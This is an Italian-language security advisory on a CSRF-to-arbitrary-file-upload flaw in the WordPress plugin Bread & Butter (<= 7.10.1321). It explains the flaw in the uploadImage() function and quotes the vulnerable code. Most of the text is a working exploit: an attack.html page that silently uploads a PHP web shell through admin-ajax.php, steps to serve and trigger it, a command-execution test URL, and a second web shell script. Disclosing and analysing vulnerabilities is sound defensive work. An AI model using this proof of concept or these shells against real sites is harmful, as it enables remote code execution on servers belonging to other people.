
Bread & Butter: Proteggi i contenuti + Cattura lead + Raccogli dati di prima parte + Coltiva con agenti AI <= 7.10.1321 - Cross-Site Request Forgery a caricamento arbitrario di file
Il plugin Bread & Butter IO contiene una vulnerabilità nella funzionalità di caricamento delle immagini che consente a qualsiasi attaccante di indurre gli amministratori autenticati a caricare file arbitrari sul server, inclusi web shell PHP, portando a esecuzione remota di codice (RCE). La vulnerabilità deriva dalla funzione uploadImage() che manca di protezione CSRF, consentendo agli attaccanti di creare richieste dannose che i browser degli amministratori eseguiranno automaticamente.
La vulnerabilità è presente nella funzione uploadImage() in /bread-butter/src/Base/Ajax.php, che non esegue una corretta validazione dei file e non ha protezione CSRF, utilizzando file_put_contents() per scrivere i file direttamente nella directory di upload di WordPress prima di qualsiasi controllo di sicurezza.
Ecco il semplice attack.html:
<!DOCTYPE html>
<html>
<body>
<button onclick="exploit()">CSRF Attack</button>
<script>
function exploit() {
const form = document.createElement('form');
form.action = 'http://TARGETSITE.COM/wp-admin/admin-ajax.php';
form.method = 'POST';
form.enctype = 'multipart/form-data';
form.target = '_blank';
form.style.display = 'none';
// Action field
const action = document.createElement('input');
action.name = 'action';
action.value = 'upload_image';
form.appendChild(action);
// File field
const file = document.createElement('input');
file.type = 'file';
file.name = 'file';
const blob = new Blob([`<?php system($_GET['cmd']); ?>`], { type: 'image/jpeg' });
const phpFile = new File([blob], 'test.php', { type: 'image/jpeg' });
const dt = new DataTransfer();
dt.items.add(phpFile);
file.files = dt.files;
form.appendChild(file);
document.body.appendChild(form);
form.submit();
}
</script>
</body>
</html>
Per un POC puoi eseguirlo localmente con qualcosa del genere:
# Serve the CSRF exploit
python3 -m http.server 1337
# Visit: http://localhost:1337/attack.html
# Click "CSRF Attack" button
# Check new tab for WordPress response
# Test uploaded shell: https://TARGETSITE.COM/wp-content/uploads/[year]/[month]/test.php?cmd=whoami
Una volta effettuato l'accesso come amministratore nel browser della vittima, il clic sul link porta a RCE.
La vulnerabilità è presente nella funzione uploadImage() alla riga 411 di /bread-butter/src/Base/Ajax.php:
public function uploadImage() {
$this->checkAdmin();
$file = $_FILES['file'];
$type = $file['type'];
$name = $file['name'];
$image_url = $file['tmp_name'];
$upload_dir = wp_upload_dir();
$image_data = file_get_contents($image_url);
$filename = basename($name);
if (wp_mkdir_p($upload_dir['path'])) {
$file = $upload_dir['path'] . '/' . $filename;
} else {
$file = $upload_dir['basedir'] . '/' . $filename;
}
file_put_contents($file, $image_data); // Attacker get's file moved to acessable storage!
// Post-upload processing (after vulnerability is exploited)
$wp_filetype = wp_check_filetype($filename, null);
// ... rest of function
}
La funzione vulnerabile è registrata come handler AJAX di WordPress alla riga 95:
add_action('wp_ajax_' . self::$uploadImage, array($this, 'uploadImage'));
Dove self::$uploadImage è definito come upload_image alla riga 37.
L'unico controllo di sicurezza è il metodo checkAdmin() alle righe 166-171:
public function checkAdmin() {
if (!current_user_can('manage_options')) {
echo 0;
wp_die();
}
}
La mancanza di protezione CSRF rende questa vulnerabilità sfruttabile tramite attacchi Cross-Site Request Forgery. Il POC attack.html lo dimostra:
target="_blank" per bypassare le restrizioni CORSattack.html)/wp-content/uploads/[year]/[month]/test.php?cmd=whoami/wp-admin/admin-ajax.php<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
} else {
echo "Shell ready. Use ?cmd=command";
}
?>
/wp-content/uploads/[year]/[month]/[filename].php